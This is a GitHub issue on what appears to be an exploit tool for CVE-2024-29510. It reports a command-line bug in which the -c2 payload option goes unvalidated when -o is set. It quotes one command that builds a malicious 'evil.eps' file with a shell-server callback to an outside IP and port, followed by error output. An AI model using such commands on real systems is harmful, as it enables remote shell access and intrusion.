Skip to content

FileFormat Doesn't Play Nicely With -o #285

@j-baines

Description

@j-baines

For some reason, I wrote up the cli code to not validate -c2 when -o is used. This is obviously wrong because -c2 controls payload generation. The result is that the proper payload is never set and an error gets generated:

albinolobster@mournland:~/initial-access/feed/cve-2024-29510/generic$ ./build/cve-2024-29510_linux-arm64 -e -out evil.eps -in template.eps -lhost 10.9.49.7 -lport 1270 -c2 SimpleShellServer -o
time=2024-12-05T14:50:36.018-05:00 level=ERROR msg="Invalid payload"
time=2024-12-05T14:50:36.018-05:00 level=STATUS msg="Exploit exited with an error" exploited=false

Metadata

Metadata

Assignees

Labels

bugSomething isn't working

Type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions